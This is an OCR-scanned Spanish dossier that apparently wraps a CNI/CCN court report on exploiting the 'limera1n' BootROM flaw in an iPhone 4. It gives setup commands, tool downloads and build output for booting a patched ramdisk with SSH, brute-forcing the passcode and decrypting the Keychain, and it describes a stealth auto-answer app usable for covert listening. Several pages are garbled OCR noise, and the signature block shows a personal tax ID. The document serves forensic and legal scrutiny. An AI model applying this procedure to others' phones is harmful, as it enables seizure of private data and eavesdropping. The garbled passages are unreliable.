[FELIX SANZ ROLDAN] Análisis técnico de la vulnerabilidad 'limerain' en el ¡Phone 4 CCN y DinoSec

Page 1

Félix Sanz Roldán Secretario de Estado

ENTIDAD ASOC PARA LA Firmado digitalmente por ENTIDAD ASOC PARA LA PREVENCION ESTUDIO DELITOS PREVENCION ESTUDIO ABUSOS NEGLIGENCIAS EN INFORMATICA CIF G80593254 - NOMBRE GALLARDO ORTIZ DELITOS ABUSOS MIGUEL ANGEL - NIF 07212602D Nombre de reconocimiento (DN): c=ES, NEGLIGENCIAS EN o=FNMT, ou=FNMT Clase 2 CA, ou=703015345, cn=ENTIDAD ASOC PARA INFORMATICA - CIF LA PREVENCION ESTUDIO DELITOS ABUSOS G80593254 - NOMBRE NEGLIGENCIAS EN INFORMATICA - CIF - NOMBRE GALLARDO ORTIZ GALLARDO ORTIZ MIGUEL G80593254 MIGUEL ANGEL - NIF 07212602D ANGEL - NIF 07212602D Fecha: 2016.11.07 19:57:52 +01'00'

director d el Centro N acional d e I nteligencia CNI Documento c on f irma digital en www.miguelgallardo.es/felix­sanz­roldan.pdf Hemos tenido acceso a una copia de su escrito de fecha 31.3.16 dirigido al Juzgado de al Centro Instrucción n° 2 de Madrid, que adjunto . Antes de cualquier otra consideración yo deseo confirmar que las 28 páginas de que consta son auténticas y que termina diciendo textualmente: Se puede ampliar cualquier punto del informe, utilizando c omo v ia p referente de c omunicación e l portal h ttp://www.ccn­cert.cni.es La asociación APEDANICA a la que desde 1992 tiene el máximo interés por ampliar ese i nforme, más aún c onsiderando los d ocumentos q ue también se adjuntan . La secretaria general del Centro Nacional de Inteligencia CNI, Beatriz Méndez de Vigo Montojo, tiene pendiente de resolver la solicitud de hace ya casi dos meses que puede verse p ublicada e n h ttp://www.cita.es/cni­upm.pdf Nos preocupa que funcionarios públicos con cargos de dirección y dedicación completa en la Universidad Politécnica de Madrid UPM puedan administrar empresas que se benefician de convenios con el CNI, al mismo tiempo que el CNI contrata a empresas privadas para proporcionar lo que un juzgado le requiere. Son conocidas mis denuncias contra funcionarios empresarios ilegales en la Oficina de Conflictos de Intereses desde hace tiempo pero también quiero que se sepa que los funcionarios que se dedican a negocios es difícil que puedan dedicarse bien a sus funciones públicas, especialmente en tecnologías complejas. En definitiva, que unos se dediquen a lo que no se deben dedicar, mientras que no se dedican a lo que sí deberían dedicarse con mayor entrega y calidad de resultados. Pero repito que quiero reservar mis últimas opiniones “ad hoc” hasta que se me confirme que la documentación a djunta es a uténtica y completa, m ejor a ún s i s e amplía y actualiza. Ignoro hasta dónde puede proporcionar información sobre todo lo que adjunto, pero sea c ual s ea en cada m omento a gradeceré q ue se a mplíe y a ctualice a l m áximo . Dr. (PhD) M iguel Gallardo , Tel. 902998352 Fax: 902998379 apedanica.org@gmail.com Asociación APEDANICA C/ Fernando Poo 16­6ºB E­28045 Madrid, SPAIN (ESPAÑA)

Se a djuntan l os d ocumentos que t ambién p ueden v erse en I nternet

http://www.cita.es/cni­iphone.pdf http://www.cita.es/juzgado­iphone.pdf http://www.cita.es/habeas­smartphone.pdf http://www.miguelgallardo.es/fcc­complaint.pdf


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

MINISTERIO

CENTRO NACIONAL

DE LA PRESIDENCIA

o

F

I

C

I

DE INTELIGENCIA

Ver nota al final en relación a http://www.cita.es/juzgado-iphone.pdf

O

S/REF.: N/REF.: lAO-C/

FECHA:

3

1

33 7'/

de marzo de 2016

ASUNTO: OIUGENCAS PREVIAS PROC. ABREVIADO 4676/2014

ANEXO: INFORME DEL CENTRO CRIPTOLÓGICO NACIONAL

DESTINATARIO: JUZGADO DE INSTRUCCIÓN N° 2 DE MADRID

)

Mediante oficio de i de febrero de 2016, con entrada en este Centro Nacional de Inteligencia (CNI) el 3 de febrero de 2016, el Juzgado de Instrucción n° 2 de Madrid, exhortó al Centro Criptológico Nacional, cuya dirección ostento en virtud de lo dispuesto en el artículo 9.2.0 de la Ley I 1/2002, de 6 de mayo, reguladora dei CNI, a realizar el correspondiente informe en relación con ei disco duro que se acompañaba con el contenido de las extracciones del terminal telefónico IPHONE 4 con IMEI 012837000896838. En su virtud, por medio del presente, se remite ei informe solicitado al Centro Criptológico Nacional con toda la información detectada, tanto activa como borrada, y su correspondiente análisis.

o DE ESTADO DIRECTOR

?r. .

.

'

Sanz Roldán -

.

%

RREO ELECTRÓNIC Dr. (PhD)

Ing. Miguel Gallardo

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy ofAvda. CVISION PDFCompressor Padre HUId00 S/fl

j

,Sn

IAflOTD


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el ¡Phone 4 CCN

y DinoSec

AUTOR/ES:

Dr. (PhD) Ing. Miguel Gallardo

¿Dato personal del perito? Ver RAÚL SILES (DINOSEC) http://www.cita.es/sentencia.pdf RAUL@DINOSEC.COM www.miguelgallardo.es/malversado.pdf

FECHA:

16 DE FEBRERO DE 2016

VERSIÓN:

1.0

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


..14 Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limera in' en el iPhone 4

Contenido i.

2.

Resumen ejecutivo ......................................................................................................................... 4

Introducción

explotación ................................................................................................. 10

3.

Entorno de análisis

4.

Preparación dei portátil para explotar la vulnerabilidad

y

5 4.1

13

Instalación ........................................................................................................................... 14

4.1.1

Xcode .............................................................................................................................. 14

4.1.2

LDID

4.1.3

Herramienta codesign_allocate ...................................................................................... 15

4.1.4

Homebrew

4.1.5

Swigyopenssl ................................................................................................................. 15

4.1.6

Enlace simbólico

4.1.7

Instalación de módulos de Python

4.1.8

Redefinir la ubicación de Xcode ...................................................................................... 16

4.2

......................................................................................................................

a

"/usr/include" desde Xcode

15

.............................................................

15

.................................................................................

16

Preparación del exploit para un modelo de dispositivo móvil iOS concreto

......................

17

........................

17

4.2.1

Asegurarse de que se han aceptado los términos de licencia de Xcode

4.2.2

Descargar las iPhone Data Protection Tools para OS X Yosemite ................................... 17

4.2.2.1

Descarga directa (opción 1) ........................................................................................ 17

4.2.2.2

Descarga mediante Git (opción 2)

4.2.3

5.

.............................................................

18

Ejecutar el script "build.py" para el dispositivo móvil iOS objetivo ................................ 18

Proceso de explotación de la vulnerabilidad

5.1

..............................................................................

Explotación de la vulnerabilidad

................................................................................

23

.........................................................................................

23

5.1.1

Conexión del dispositivo móvil al ordenador ................................................................. 23

5.1.2

Apagar el dispositivo móvil

5.1.3

Ejecutar el script de arranque "boot.py': redsn0w

5.1.4

Arrancar el dispositivo en modo DFU ............................................................................. 25

5.2

y

cerrar iTunes

....................................................................

........................................................

Capacidades disponibles una vez explotada la vulnerabilidad

...........................................

23

23

28

5.2.1

Acceso al dispositivo móvil mediante SSH ...................................................................... 28

5.2.2

Ataques de fuerza bruta sobre el código de acceso del dispositivo móvil

5.2.3

Descifrando las credenciales almacenadas en el Keychain del dispositivo móvil ........... 32

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

.....................

30

Page 2

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el ¡Phone 4

5.2.4

Potencial instalación de aplicaciones en el dispositivo móvil ......................................... 33

5.2.5

Acceso

5.3

a

todos los datos almacenados en el dispositivo móvil ...................................... 33

Reinicio del dispositivo móvil tras explotar la vulnerabilidad ............................................. 34

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

perito judicial investigador

Page 3

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4

2.

Introducción

presente informe refleja los resultados de un análisis técnico asociado a la vulnerabilidad conocida como 'limerain' presente en el BootROM de los dispositivos móviles de Apple basados en el núcleo o SoC (System on Chip) modelo A4, como por ejemplo el iPhone 4 (junio de 2010), el iPad (abril de

El

i

2010), el iPod Touch de 4 generación o el Apple TV de 2 generación (ambos de septiembre de 2010)2. El SoC A4 fue fabricado y comercializado por Apple a partir de marzo de 2010:

El

análisis técnico, y el presente informe asociado, ha sido efectuado por Raúl Siles (DinoSec), consultor

de seguridad, actuando en colaboración con el CCN (Centro Criptológico Nacional), durante el mes de

febrero de 2016. EI

análisis se llevó

a

cabo con el objetivo de verificar si sería posible disponer de control completo

sobre un dispositivo móvil iOS de Apple, modelo ¡Phone 4 (identificado como "Model A1332"3 y con FCC-ID = BCG-E2380B4), si se dispone de acceso físico al mismo, ratificándose que debido a la

vulnerabilidad mencionada, El

es

posible disponer de dicho acceso.

BootROM5 es el componente que contiene el primer fragmento de código relevante que es

ejecutado durante el proceso de arranque de los dispositivos móviles de Apple. Dicho código reside en una memoria de sólo lectura, como su propio nombre indica (ROM, Read Only Memory). 57446, asociadas al SoC A4, vulnerabilidad 'limeraln' afecta a las versiones de BootROM hasta la conocido como el modelo S5L89307. Esta vulnerabilidad y el exploit asociado fueron publicados el 9 de octubre de 2010 por el investigador George Hotz (geohot), y afectan también a versiones previas de SoCs de Apple, como por ejemplo los empleados en el ¡Phone 3GS y en el iPod Touch de 3 generación (también basados en la arquitectura ARMv7). El nombre de la vulnerabilidad y el exploit La

asociado provienen del nombre de la primera herramienta que hacía uso de estos para llevar a cabo el proceso de jailbreak en los dispositivos móviles de Apple: limeraln8. El exploit ha sido también

2

http://iossupportmatrix.com referencia numérica dei modelo de iPhone está disponible en 4 https://www.fcc.gov/general/fcc-id-search-page (Grantee code https://www.theiphonewiki.com/wiki/Bootrom 6 https://www.theiphonewiki.com/wiki/Bootrom_574.4 7 https://www.theiphonewiki.com/wiki/55L8930 8 https://www.theiphonewiki.com/wiki/Limeraln 3

La

:

la

parte posterior del mismo. Product code: -E2380B)

BCG,

5

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

perito judicial investigador

Page 5

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el iphone 4

Adicionalmente se conoce la existencia de otro exploit que sólo afecta al SoC A4 de Apple, y por tanto, también al dispositivo móvil bajo estudio. Este otro exploit, denominado SHAtter16, nunca ha sido utilizado por parte de las herramientas públicas que permiten llevar a cabo el proceso de jailbreak en los dispositivos móviles de Apple, ya que el exploit de 'limerain' fue publicado en primer lugar y afectaba

a

un mayor número de dispositivos.

que la vulnerabilidad conocida como 'limerain' afecta al hardware del dispositivo, en concreto al BootROM, no es posible solucionarla mediante actualizaciones software, siendo necesario

Debido

a

actualizar el hardware del dispositivo, es decir, de manera efectiva, sustituir el dispositivo por un modelo más nuevo basado en otra versión de SoC no vulnerable. Asimismo, debido a que se trata de una vulnerabilidad hardware, permite su explotación independientemente de la versión software de

operativo móvil de Apple) instalada en el dispositivo móvil. Por tanto, se han visto afectadas por esta vulnerabilidad tanto las versiones de iOS empleadas originalmente por los primeros dispositivos vulnerables, como iOS 3.2.2 en el iPad 1, hasta las últimas versiones soportadas por los lOS (el sistema

dispositivos vulnerables, como lOS 7.1.2 en el iPhone 4. Tras explotar la vulnerabilidad

'limerain',

se dispone de plenas capacidades para

modificar y alterar

el funcionamiento del dispositivo móvil objetivo. Sería por tanto posible realizar las modificaciones deseadas para cambiar el comportamiento estándar del dispositivo móvil y, por ejemplo, añadir nuevas capacidades para que el mismo responda automáticamente algunas llamadas recibidas, por

ejemplo, en función del número llamante. Existen aplicaciones móviles (apps) como AutoAnswer17 que disponen de estas capacidades. Esta app está disponible desde Cydia (un repositorio público de apps para lOS) para dispositivos móviles iOS con el jailbreak aplicado, y permite responder automáticamente tanto

a las

llamadas de voz

a

través

de la red de telefonía o celular, como a las llamadas de voz y vIdeo conferencia a través de FaceTime. AutoAnswer es compatible con las versiones iOS 4, 5, 6 y 7, es decir, con la versión instalada en el

iPhone 4 bajo

estudio'8.

AutoAnswer permite seleccionar los números Ilamantes (hasta tres) para los que el teléfono responderá las llamadas automáticamente sin la intervención del usuario (y potencialmente, para cualquier número), así como definir si la llamada será respondida inmediatamente o tras un tiempo determinado (especificado en segundos en la configuración de la app). Adicionalmente, la app dispone de un modo silencioso (o Stealth Mode) para que el teléfono no emita ningún sonido asociado a la llamada entrante, de forma que el usuario no sea consciente de la misma, no mostrándose ni siquiera que hay una llamada activa, y no dejando registro en el histórico de llamadas recibidas. La descripción de la app en inglés detalla varios de sus diferentes casos de uso:

"AutoAnswer has several uses like: baby-watching over FaceTime, auto-answering specific numbers while driving, while using your phone with a bluetooth headset, instant response to 16 17

la

https://www.theiphonewiki.com/wiki/SHA-1_ImageSegment_Overflow http://moreinfo.thebigboss.org/moreinfo/clepiction.php?fileautoanswerData Adicionalmente existe una versión para lOS 8: http://moreinfo.thebigboss.org/moreinfo/autoanswer.php

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 7

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el iphone 4

651 -234ML

Perhaps the most powerful of this application.

option-

if enabTéd, thé

phone does flot ting at aIftheuser Unaware of the autoatswered call and the cati is not written to call history. The phoneanswers in

is

the backgthund without showing that

asaD is

active,,

andyou can

hear I mónitor the remote area or view the remove camera via FaceTImeXes, it also auto answers Fac-eTime calls «ree of charge in most ar?as)Note that -

unless the caller mutes the

vola

mk.

be heard on the answering phone Side hislher

niight

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 9

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4

.ttw d -J

2OI

Ob

Pw

AcWa.ór

aza

,steF.-,

s.

tao

ebb_F

I

JZZ

fX

ste>

,eh_

. e,

>

eb5eer

r4e

h-

fo?r,eci &aeece

s

rsççnlmeflátd br M Aped

dCOfle;4do de ,,&r4ad

be

ceta attuebzjc.S. conebte. .. Más

de Remcde Deektep CebÌt The

384 seSaM

ft' -m5M

PeeMbe ebosts

a

5 edárebseS seserd sbus; ro'atgfl to tebC

Feb & 2b1C

V i'

Teces

et

Verebs12&2

'.

esM

.

tsMee.do M Feb & 2010

t

o

,

-

t

'

-::.'

\/

,s

ACtCstdsCtO - S Cscttánads de

MetMado et Fob 4 2018

St

2015 ISSeCS i

.5

s35

s-

ed

t

óflL. to

't--t s-

-'

OS X LasCtuCtt 5eb,deOSXYoscnt.telOI, rtc,o stessi stedob OC 555545.

veos1Oto

5555e55t

i

.

á

bt.i

1045545 d5Ceb5555Y5CbDÇ. eMCee 55 pew.s5sC

t

VSt!5905

t

555 hSC5C

E5V at ce 's:5

aSepsie

S

t

Tste

t5s-5--4- 5 te5d5

? &5

referencia en los ficheros de firmware de iOS asociada al modelo de iPhone 4 A1332 en las diferentes versiones de hardware es iPhone3,1 o iPhone3,221. La

Todas las pruebas realizadas han hecho uso de dispositivos móviles de Apple modelo Phone 4 (A1332) con la versión 7.1.2 de iOS, al ser esta la versión existente en el dispositivo móvil iPhone 4 de referencia

que ha originado el presente análisis. Es

posible verificar

la

versión de BootROM del dispositivo móvil objetivo arrancándolo en modo DFU

(Device Firmware Update), mediante un proceso de arranque personalizado que permite restaurarlos

dispositivos móviles de Apple22: 1.

Conectar el dispositivo móvil al ordenador mediante un cable USB.

2.

Apagar el dispositivo móvil.

3.

Esperar

4.

5.

Arrancar el dispositivo móvil manteniendo pulsado el botón de arranque (o botón de encendido y apagado) durante 3 segundos. Pulsar el botón de arranque y de "Home" simultáneamente durante 10 segundos.

6.

Soltar el botón de arranque pero mantener pulsado el botón de "Home".

7.

Después de unos 15 segundos, iTunes indicará que ha detectado un dispositivo en modo

a

que el dispositivo móvil se apague completamente.

recuperación. La

21 22

pantalla del dispositivo permanecerá en blanco (de color negro), sin ningún logotipo o imagen.

https://www.theiphonewiki.com/wiki/Models https://www.theiphonewiki.com/wiki/DFU_Mode

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 11

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 9imeraln' en el iphone 4

4. Preparación dei portátil para explotar la vulnerabilidad El

siguiente procedimiento permite configurar el entorno necesario en

explotar

la

OS X

Yosemite (1O.1O.x) para

vulnerabilidad 9imeraln' sobre dispositivos móviles de Apple vulnerables.

Para ello es necesario instalar diferentes herramientas y utilidades, junto a sus prerrequisitos software, así como el entorno de desarrollo de Apple, conocido como Xcode. Adicionalmente se hará uso de las iPhone Data Protection Tools23, un conjunto de utilidades que permiten demostrar el

potencial del exploit de 9imeraln', tanto para obtener acceso completo al dispositivo mediante un shell (o línea de comandos), asícomo poder realizar ataques de fuerza bruta sobre el código del acceso

fijado en el dispositivo móvil. Una vez obtenido el código de acceso, es posible descifrar el Keychain, qué proporciona acceso a todas las credenciales (usuarios y contraseñas) y certificados del usuario, así como el contenido completo de la memoria del dispositivo móvil y acceder a la totalidad del sistema de archivos (incluyendo todos los ficheros y directorios). Los scripts de gestión del Keychain24 pueden ser instalados en cualquier dispositivo móvil iOS con el proceso de jailbreak aplicado para

inspeccionar los elementos almacenados en el Keychain, así como sus clases de protección25.

Adicionalmente, estas herramientas tienen capacidades para descifrar los backups de iTunes ('tbackup_tool.py") y para crear imágenes ramdisk del dispositivo móvil objetivo desde el punto de vista forense ('dumpdata_partition.sh). Por otro lado, una versión modificada de HFSExplorer

permite hacer uso de la imagen ramdisk creada previamente para procesar las imágenes de las particiones de la memoria de los dispositivos móviles iOS. Para finalizar, en una actualización posterior emf_decrypter.py", que permite descifrar las imágenes de disco se añadió la utilidad

permanentemente y la utilidad "emf_undelete.py", que permite que no han sido aún sobrescritos. Para llevar

a

es necesario

la

recuperación de ficheros borrados

cabo varios de los pasos descritos en el proceso de preparación detallado

a

continuación,

disponer de conectividad hacia Internet desde el equipo de análisis.

Todos los comandos indicados a continuación deben ser ejecutados por un usuario con privilegios de

administrador en OS X, para que pueda ejecutar comandos como root mediante sudo en aquellos casos donde es necesario. Una vez se dispone del portátil preconfigurado, es posible hacer uso del exploit de

limerain'

directamente, siguiendo las instrucciones del apartado "5. Proceso de explotación de

la

vulnerabilidad.

23

https://code.googe.com/archive/p/iphone-dataprotection/ En ocasiones referenciados como utilidad KeychainViewer. 25 https://www.apple.com/la/iphone/business/docs/iOS_security_Mayl2.pdf 24

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 13

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 9imeraln' en el iPhone 4

$

sudo mkdir -p /usr/local/bin curl -O http://networkpx.googlecode.com/files/ldid chmod +x idid sudo cp idid /usr/local/bin

El

hash SHA1 de Idid es: 27bc747804aaec28795a017b85254d2bc7de6132.

s s s

herramienta codesign_allocate es utilizada por las iPhone Data Protection Tools, por lo que también debe estar disponible en el PATH. La herramienta codesign_allocate está incluida en Xcode versión 5.1.1 y está disponible por defecto en el PATH bajo La

hh/usr/binu:

which codesign allocate /usr/bin/codesign allocate

s

Se

instaló el gestor de paquetes Homebrew en

s

ruby -e "$(curl -fsSL

OS X

(por defecto, bajo /usr/local/bin/brew'):

https://raw.githubusercontent.com/Homebrew/install/master/install)"

Mediante el siguiente comando se procedió a inicializar Homebrew (se obtiene un mensaje de aviso indicando que la versión de Xcode utilizada está desactualizada): $

brew doctor

NPEUIitMI herramienta swig, en concreto la versión 3.0.8, necesaria para de Python posteriormente, como por ejemplo, M2crypto:

Se

instaló

s

brew install swig

la

la instalación de

módulos

instaló openssi, en concreto la versión 1.O.2f, necesaria para la instalación de módulos de Python posteriormente, como por ejemplo, M2crypto:

Se

$

brew install openssl

.

-AfifTflrIfflT

"/usr/includ&' asociado al mismo directorio en Xcode, necesario para instalación de módulos de Python posteriormente, como por ejemplo, M2crypto: Se

creó un enlace simbólico

s

sudo ln -s

a

la

/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/DevelO per/SDK5/NacOSX1O.09.sdk/usr/include/ /usr/include © 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 15

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limera in' en el iPhone 4

w_

:

_.L,) trw

ii w

iw

5

r:

F

si

Fflhs

.íi

ii

i

i

i

i i

ni. F

flT !'T

I

i

sIs1 fl

ti

iinti1 UtS

I(s

permiten preparar el ordenador empleado para el análisis con el objetivo de explotar un modelo de dispositivo móvil iOS de Apple específico. Estos pasos son, por tanto, necesarios y deben ser repetidos para poder explotar cada modelo de dispositivo móvil diferente, es decir, deben repetirse para el ¡Phone 4, para el iPad i, etc. En el caso de estudio analizado, todos los pasos mostrados aplican únicamente al iPhone 4 al ser este el dispositivo móvil objetivo. Los siguientes pasos

Para ello sólo es necesario ejecutar el siguiente comando, visualizar los términos de licencia y teclear

"agree" para aceptarlos: sudo xcodebuild -license

s

I:t

Descargar la versión específica de las ¡Phone Data Protection Tools para Yosemite y Xcode 5.x,

existiendo dos opciones: mediante descarga directa (opción recomendada desde el punto de vista forense) o mediante Git. Protection Tools, también conocidas como iDPT, toman su nombre del término "data protection" (o "protección de datos" en español), empleado porApple para referirse a los mecanismos de protección de datos y cifrado de ¡OS. Estas herramientas fueron originalmente publicadas en http://code.google.com/p/iphone-dataprotection/, junto a la presentación asociada de la conferencia Hack in the Box, HitB, del año 2011 en Amsterdam por Sogeti/ESEC29.

Las iPhone Data

t

ritt1WrIiQW .

Desde el punto de vista forense, se pueden descargar las iPhone Data Protection Tools directamente

desde el fichero ZIP asociado, en lugar de mediante Git,

a

través de

la

siguiente URL:

cd $HOME/Downloads s curl -LOJ https://github.com/dinosec/iphone-dataprotectionxcode5/archive/l O i zip s

.

La

.

.

descarga creará el fichero "iphone-dataprotection-xcode5-i.O.i.zip". Se debe crear un directorio

de trabajo y copiar las iPhone Data Protection Tools al mismo:

s

mkdir $HOME/iDPT

s

cd $HOME/iDPT

s s

29

unzip $HOME/Downloads/iphone-dataprotection-xcode5-1 .0 .l.zip mv iphone-dataprotection-xcode5-1 O i iphone-dataprotection .

.

http://conference.hackinthebox.org/hitbsecconf2ûllams/materials/D2T2%20-%2OJean-

Baptiste%2OBe%cC%8ldrune%20&%2OJean%2OSigwald%20-%2OiPhone%2OData%2OProtection%2Oin%2ODepthpdf

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 17

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4

inflating: inflating: inflating: inflating: inflating: inflating:

redsnüwmacO inflating: inflating: inflating: racoon tar extracting: creating: inflating:

redsnOwmacO.9.15b3/redsnOw.app/Contents/MacOS/bootlogo.png redsnOwmacO.9.15b3/redsnOw.app/Contents/NacOS/bootlogox2.png redsnOwmacO.9.15b3/redsnüw.app/Contents/MacOS/corona-A5.tar redsnOwmacO.9.15b3/redsnüw.app/Contents/MacOS/Cydia.tar.lzma redsnOwmacO.9.l5b3/redsnOw.app/Contents/MacOS/Keys.plist 9 l5b3/redsnOw app/Contents/MacOS/progresslogo png redsnOwmacO.9.l5b3/redsnOw.app/Contents/MacOS/rd.tar redsnOwmacO 9 l5b3/redsnOw.app/Contents/MacOS/redsnOw redsnOwmacO.9.l5b3/redsnOw.app/Contents/MacOS/rocky.

.

.

.

.

.

.

redsnOwmacO

redsnüwmacO.9.15b3/redsnüw.app/Contents/Pkglnfo redsnOwmacü.9.l5b3/redsnüw.app/Contents/Resources/

9 l5b3/redsnüw app/Contents/Resources/redsnOw icns Decrypting kernelcache.release.n90 Unpacking ... Doing CSED patch Doing getxattr system patch Doing nand-disable-driver patch Doing taskforpidO patch Doing IOAES gid patch Doing AMFI patch Doing AppleIOPFMI: :fmiPatchMetaFringe patch Doing PEicanhasdebugger patch Doing IOAESAccelerator enable UID patch Added IOFlashControlleruserClient::externalMethod patch at file offset 0x5f08f4 Patched kernel written to data/boot/kerneliPhone3, 15. 09A334 .patched Decrypting 0l8-7923-347.dmg Decrypted ramdisk written to data/boot/ramdiskiPhone3, l5.09A334 .dmg Rebuilding ramdisk tools Found iOS SDK at /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Deve loper/SDKs/iPhoneOS7 1 sdk/ lOKit headers missing Symlinking headers .

.

.

+

.

.

.

sudo ln -s

/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Develo per/SDK5/MacOSXlO 9 sdk/System/Library/Frameworks/IOKit framework/Headers /Applications/Xcode app/Contents/Developer/Platforms/iPhoneOS platform/Deve loper/SDK5/iPhoneOS7 1 sdk//System/Library/Frameworks/IOKit framework/Heade .

.

.

.

.

.

.

.

rs

Password: + sudo ln -s /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Develo per/SDK5/MacOSXlO 9 sdk/usr/include/libkern/OSTypes .h /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneüS .platform/Deve loper/SDK5/iPhoneOS7 1 sdk//usr/include/libkern/OSTypes .h + set +x .

.

.

.

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

Page 19

perito judicial investigador

www.miguelgallardo.es/audio.pdf

PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor


Asociación APEDANICA Tel. 902998352

www.cita.es/apedanica.pdf

s

PUBLICADO en www.cita.es/cni-iphone.pdf

Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4

min=4 O -o ioflashstoragekit ioflash/ioflash. c ioflash/ioflashkernel .0 ioflash/ioflashstoragekit.c ioflash/IOFlashPartitionScheme.c util.c codesign -s - --entitlements entitlements.plist ioflashstoragekit clang -arch armv7 -Wall -Wno-pointer-sign -isysroot /Appiications/Xcode app/Contents/Developer/Platforms/iPhoneOS platform/Deve loper/SDKs/iPhoneOS7.1.sdk/ -DHGVERSION="\"unknown\" -03 -I. -framework CoreFoundation -framework lOKit -framework Security -miphoneos-versionmin=4.O -o ttbthingy ttbthingy.c codesign -s - --entitlements entitlements.plist ttbthingy Non-fat file: ramdisktools/restoredexternal is architecture: armv7 resizing ramdisk... hdiutil will segfault if ramdisk was already resized, thats ok Attaching ramdisk /dev/disk2 /Volumes/ramdisk Unpacking ssh.tar.gz on ramdisk... bin!: Already exists bin!cat: Already exists bin,/launchctl: Already exists bin!ln: Already exists bin!mkdir: Already exists bin!mv: Already exists bin/'rm: Already exists etc!: Already exists shin!: Already exists usr!: Already exists usr!bin!: Already exists usr!lib!: Already exists var,': Already exists tar: Error exit delayed from previous errors. This tar error message is okay Adding!updating ramdisktools binaries on ramdisk... total 568 204B 14 feb 21:45 drwx ------ 6 usuario staff l7OB 14 feb 21:45 .. drwxr-xr-x 5 usuario staff 104K 14 feb 21:45 bruteforce -rwxr-xr-x 1 usuario staff staff 103K 14 feb 21:45 device infos -rwxr-xr-x 1 usuario 65K 14 feb 21:45 ioflashstoragekit -rwxr-xr-x 1 usuario staff 5l4B 14 feb 21:45 mount partitions.sh -rwxr-xr-x 1 usuario staff "disk2" unmounted. "disk2" ejected. Build OK, running boot.py Using data!ipsw!iPhone3, 15. O9A334Restore.ipsw Use nand-disable boot flag ? [y!n] n .

.

.

NOTA: Los errores asociados al mensaje "no repositoryfound" y "(.hg

ejecución del script asociado, "build_tools.sh", y se deben

a

a la

que la versión utilizada de las iPhone Data

© 2016 DinoSec (www.dinosec.com)

Dr. (PhD) Ing. Miguel Gallardo

notfound)" no afectan

Page 21

perito judicial investigador

www.miguelgallardo.es/audio.pdf

